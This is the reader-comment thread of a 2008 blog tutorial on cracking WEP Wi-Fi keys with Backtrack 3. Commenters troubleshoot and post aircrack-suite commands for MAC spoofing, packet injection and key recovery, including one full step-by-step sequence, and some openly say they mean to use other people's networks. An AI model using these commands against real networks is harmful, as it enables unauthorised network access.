Whats the w0rd?

Bringing you the w0rd from the virtual streets

37 Users Responded To "Tutorial: Cracking WEP Using Backtrack 3"

Emrikol said,

8-20-2008 in 07:40:04 at 165.139.0.20    

Thanks Maz! You’re a lifesaver. I spent a while trying to do this with russix and I couldn’t get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals…luckily WEP)

Anon said,

8-21-2008 in 12:30:30 at 123.222.97.173    

or you could just buy your web access and not be fucking people over for bandwidth etc.

nico said,

8-21-2008 in 21:20:52 at 76.121.109.166    

Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don’t know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks

Registered99 said,

8-22-2008 in 13:52:32 at 67.8.114.113    

There is no macconfig?
macconfig: command not found

Maz said,

8-22-2008 in 14:12:59 at 64.52.32.138    

@Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I’m updating the post as I write this. Good luck!

dubpluris said,

8-22-2008 in 14:42:34 at 76.169.72.163    

Thanks a lot. I don’t really even plan on using this, but it was very informative and clear. Thanks for the effort.

keen said,

8-22-2008 in 15:06:36 at 72.138.72.112    

I personally do not worry if someone hacks into my router to go online. What worries me is when the intentions go further: breaking into my desktop, or using my connection to do bad things, which would get me a surprise knock on the door by the FBI. This is a darn good reason I remain connected with troublesome hard wiring or stick to the old router b version.

justgeig said,

8-24-2008 in 00:52:00 at 67.236.135.19    

just wondering what are your thoughts on hiding/not broadcasting the SSID…decently secure or no?

Maz said,

8-24-2008 in 02:44:18 at 75.222.163.109    

@justgeig if there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn’t offer much more security. Might just be a speed bump in some situations.

JodoKaast said,

8-27-2008 in 15:12:12 at 67.171.68.60    

aircrack-ng also has the PTW algorithm attack, which needs far fewer IVs to successfully decrypt a WEP key. You can invoke it using the ‘-z’ switch with aircrack-ng. I’ve cracked a 128-bit WEP key with only about 40000 IVs.

Nick said,

8-29-2008 in 10:01:54 at 81.215.117.146    

I have done exactly as you told. My wifi chipset is Intel® PRO/Wireless 3945ABG.

The problem is that after I use

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

I get no packets from my access point. Then I use:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

After this I get many packets, but something like 50000 packets have only 1 IV.

The access point I’m testing on is Dynalink_Datron.

Hope someone can help

jones said,

9-5-2008 in 02:35:27 at 24.28.254.73    

Having trouble cracking wep key at my house. After performing this command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] the output for dest mac is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest mac is the fake mac. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs

Maz said,

9-5-2008 in 09:01:26 at 64.52.32.138    

@jones hey, check out the following site for more information about Interactive Packet Replay: http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

Hopefully that will give you a little more background and assist you in your efforts. Good luck!

Goatse said,

9-7-2008 in 19:40:43 at 70.82.182.92    

great tutorial, scary

moosacha said,

9-11-2008 in 14:21:07 at 166.197.149.121    

“aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]”

If you use interactive packet replay, wouldn’t you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know, what you’ll be capturing won’t be ARP packets, so the PTW method will not work for you. You’ll probably need to capture about 1,500,000 IVs before having a good chance of getting the key. Or am I mistaken?

josh said,

9-12-2008 in 07:29:11 at 211.30.243.184    

Hey, great tut. Just one question: when I run the
ifconfig down [wifi0] command I get an error, something like interface not found, but when I run airmon-ng stop [device] it says the interface is wifi0, so I’m pretty sure it’s the right interface. BTW, interface and device are the same thing on my machine. Oh, and last thing: how do you get out of monitor mode?

croakey said,

9-18-2008 in 18:56:19 at 71.204.75.214    

This tutorial is wonderful and worked for me!

This line however needed the following changes to work for me.

before:
airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

after:
airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

browncardboard said,

9-30-2008 in 08:12:41 at 68.163.213.110    

Great tutorial! What would need to be modified in the code to get it to work with an Atheros chipset?

I can’t quite figure it out.

browncardboard said,

9-30-2008 in 20:30:46 at 32.142.88.178    

for atheros based chipsets use ath_pci in place of the numbers for the modprobe command. I also had to remove the -r to get it to load- BUT I have no idea what I’m doing yet

Hope this helps someone

browncardboard said,

10-6-2008 in 17:38:16 at 98.216.15.38    

This tutorial helped me a lot - it was the basis for me learning BT3. However, some of the above post did not work for me. I am using an Atheros chipset, and some things had to be changed. Hope this helps someone.

modprobe ath_pci

modprobe ipwraw

iwconfig

airmon-ng stop ath0

ifconfig wifi0 down

macchanger --mac 00:11:22:33:44:66 wifi0

airmon-ng start wifi0

airodump-ng ath0
gives available routers

******** cd /mnt/hda2/
can do this to change the place to save the data
airodump-ng -c 6 -w network.out --bssid 00:21:21:21:21:21 ath0
collects shit

aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e "smokers suck" ath0
must play around with this to get it on the same channel
should get:
15:56:18 Association successful :-) (AID: 1)

aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

cd /mnt/hda2 <- Used this to re-locate to the directory with the file
aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap

digitalfear said,

10-13-2008 in 03:25:16 at 213.207.81.210    

Can I use the wifi wireless network card that’s in my laptop?

Nedad said,

10-13-2008 in 06:38:04 at 212.27.27.187    

Hi there

I am new to Wifi and Linux. I have just been on Amazon to order books so I can read about Linux. They will be here in some days, but I can’t wait for some days.

I am trying this tutorial and I get an error:
bt ~ # modprobe -r iwl4965
bt ~ # modprobe ipwraw
bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

bt ~ #

If I run “modprobe -r iwl4965” then iwconfig can’t find my wireless adapter and I can’t find the interface name.

What am I missing here or doing wrong?

Thanks
Nedad

Guest said,

10-18-2008 in 11:14:42 at 70.131.100.196    

Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng down [interface]

What is the interface?
All I can find is the device name.

I get the error ‘host name lookup failure’.

I think this is why my #data is staying at zero and beacon is at like 30000.

Guest said,

10-18-2008 in 19:46:44 at 70.131.100.196    

i got it all working i cant active attack, thanks for the great tutorial

tuborg3110 said,

10-19-2008 in 17:47:14 at 92.37.126.74    

Great tut. I also have a question, or 3 problems. 1) Well, after this step: aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device), there are a lot of read packets (100 000), but there are no ARP requests and ACKs, and data is 0, or just a few, maybe 3 or 4, etc.
So what’s the problem?
2) Also, a lot of times this step doesn’t work: aireplay-ng -10 -a bssid -h 00:11:22:33:44:55 -e essid (device); after that there is no Authentication successful and Association successful. 3) The next problem: after this aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device), there are no ARPs and ACKs, so with another laptop I tried to connect to the same secure network, and then the ARPs and ACKs started, but the data is not rising. Only when I try to connect with the other laptop does the data rise, and when I stop, the data also stops. And after maybe 50 000 IVs I can’t crack because that’s not enough IVs. Do you have any solution for what I can do?

tuborg3110 said,

10-19-2008 in 17:54:28 at 92.37.126.74    

One more thing - there is no problem with the wireless card, because I tried with 5 different ones!!

Talha said,

10-20-2008 in 13:32:28 at 91.140.219.157    

How to increase the speed of injecting packets?
The #data column doesn’t rise very fast after injecting packets … it would take around 4 hours to rise to about 10000 packets … how to make it rise faster?

I am using an intel3495 card …

XxLIL_NOYXX said,

11-15-2008 in 20:20:01 at 71.237.166.148    

im getting a msg saying

Fwrite(packet data) failed no more space on device
fwrite(packet filter) failed no more space on device

while collecting packets. After a while it will corrupt the packets collected??? Help, how do I relocate where the data is sent??

guest said,

11-16-2008 in 08:15:03 at 121.97.212.45    

Can I run BackTrack 3 in Windows Vista? Please tell me how. Thanks.

Maz said,

11-16-2008 in 13:26:17 at 208.120.217.126    

@guest no. And the fact that you asked that question really shows how little you know. You should search google, read, and learn more about what an operating system is and other computer basics before you try to go and crack WEP. You are obviously not going to crack WEP for any legitimate security purpose.

nomoss said,

11-18-2008 in 17:42:55 at 151.196.179.195    

Nice job on the tutorial. I am having some trouble with the airmon-ng and airodump-ng. The apps start but are not finding any data and seem unstable. The first few times they did find some networks. But now they don’t find anything. I have the same Centrino wireless card cited in the tutorial. Kismet is working fine and finding many networks. Any help would be appreciated. Z.

Ross (Software Developer) said,

11-21-2008 in 06:38:32 at 195.149.28.208    

Nice tutorial. Have tried this before but my Laptop’s wireless card is not compatible. Will be purchasing a new card soon as this is a neat trick to show our clients.

blahhh2 said,

11-21-2008 in 07:07:44 at 85.137.208.67    

For all of you people asking about ifconfig, it’s not

ifconfig down [interface]

is

ifconfig [interface] down

have a good day ;)

Trackbacks & Pingbacks

ping

Cracking WEP Using Backtrack 3 | What Is Wrong With The World Today mention,

8-22-2008 at 12:45:15 ping from 208.179.83.35    

[...] You can use these techniques to demonstrate to others why using WEP is a bad idea.  I suggest you use WPA2 encryption on your wireless networks.  Goodluck! From: http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-3/ [...]

ping

Web Sites of Interest » links for 2008-08-24 mention,

8-24-2008 at 08:30:36 ping from 74.220.207.84    

[...] Tutorial: Cracking WEP Using Backtrack 3 | Whats the w0rd? (tags: linux wireless wifi wep hacks hacking cracks cracking) [...]

ping

KoreK chopchop, Kismet, Gateway Ubuntu | Remote Security mention,

10-11-2008 at 14:34:49 ping from 82.119.226.56    

[...] Tutorial with pictures for ipw3945 & Backtrack you can check at here. [...]
